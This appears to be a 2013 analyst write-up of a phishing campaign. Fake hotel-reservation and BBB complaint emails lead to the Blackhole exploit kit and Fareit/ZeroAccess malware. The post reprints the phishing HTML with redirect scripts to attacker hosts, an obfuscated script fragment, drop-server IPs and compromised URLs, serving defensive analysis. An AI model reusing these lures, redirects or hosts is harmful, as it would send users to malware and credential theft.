Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign is using the "shock and awe" billing technique to create urgency. This campaign is using predictable Blackhole techniques.
Also spotted on DSL Reports


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
Autoclerk is a property management system that provides eMarketing to Hotels.
http://www.autoclerk.com/hotel-emarketing

^^

Content-Type: multipart/alternative; <-- Plain text and html elements k.
X-Spam-Status: No, score=5.8 <--- Not close enough.

Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.

The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.

(html>(CR)(LF)

(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)

(script·type="text/javascript">(CR)(LF)

(!--(CR)(LF)

location.replace("http://winne2000.net/news/enough-advise.php");(CR)(LF)

//-->(CR)(LF)

(/script>(CR)(LF)

(noscript>(CR)(LF)

(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php">(CR)(LF)

(/noscript>(CR)(LF)

(CR)(LF)

(/head>(CR)(LF)

(CR)(LF)

(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)

(CR)(LF)

(CR)(LF)

(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)

(CR)(LF)

(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)

(CR)(LF)

(h3>Redirecting·to·Complain·details...·Please·wait...(/h3>(CR)(LF)

And the payload begins us with 

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper

The caewbtew=~ string at the entry point is consistent with FedEx, American Airlines, DHL, and paypal with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.

This string has also been spotted in other compromised wordpress sites, about 860 indexed in google.

April http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11

April https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt

May http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec

June http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0

Which also contained the string:

Redirecting to Complain details... Please wait...

Something like 860 hits. Same as the BBB Campaign

Proving once again that nothing beats a human security analyst:

I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.

References:

http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam

https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ (Oddly enough about a Windows 98 system hit with exploit)

http://pastebin.com/vBVJUb9w

BBB Phish Event - Blackhole - ZeroAccess

EMAIL

The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.

We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.

We are looking forward to your prompt response.

Best regardsTristan LewisDispute CouncilorBetter Business Bureau

==============HTML====================

GET /bbb.html HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Accept-Encoding:              Host: speedgarage.com.uaConnection: Keep-Alive

HTTP/1.0 200 OK

Server: nginx/1.1.10

Date: Fri, 07 Jun 2013 17:13:03 GMT

Content-Type: text/html

Content-Length: 738

Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT

Accept-Ranges: bytes

Connection: keep-alive

(html>

(title>BBB is loading...(/title>

(script type="text/javascript">

(!--location.replace("http://pnpnews.net/news/readers-sections.php");

//-->

(/script>

(noscript>

(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">

(/noscript>

(/head>

(h1>You will be redirected to process(/h1>

(h3>Redirecting to Complain details... Please wait...(/h3>

location.replace("http://pnpnews.net/news/readers-sections.php");

"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php

Payload: pnpnews.net

Exploit Kit: Blackhole

Snort Rules 

ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)

Drop Points: 
88.191.130.98:8080

• 8080/tcp open  http    nginx 1.0.10
• 21/tcp   open     ftp          Pure-FTPd
• 22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
• 25/tcp   open     smtp         Postfix smtpd
• 80/tcp   open     http         Apache httpd 2.2.14 ((Ubuntu))
• 8080/tcp open     http         nginx 1.0.10
• 8090/tcp open     http         nginx 1.2.6

213.214.74.5:8080 

• 8080/tcp open  http         nginx 1.0.10
• 21/tcp   open     ftp          ProFTPD 1.3.3d
• 22/tcp   open     ssh          OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
• 80/tcp   open     http         Apache httpd 2.2.17 ((Ubuntu))

Disk Artifacts of Interest: 

exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
exp1.tmp
exp2.tmp


URLs Involved
hxxp://carpenterpricebreaker.com/bbb.html
hxxp://ecotopia.pl/bbb.html
hxxp://gite-cantal-meandres.fr/bbb.html
hxxp://ib-greb.de/bbb.html
hxxp://intelaboratory.com/bbb.html
hxxp://rentbaku.com/bbb.html
hxxp://slavamoskovkin.ru/bbb.html
hxxp://speedgarage.com.ua/bbb.html
hxxp://vmoskalev.ru/bbb.html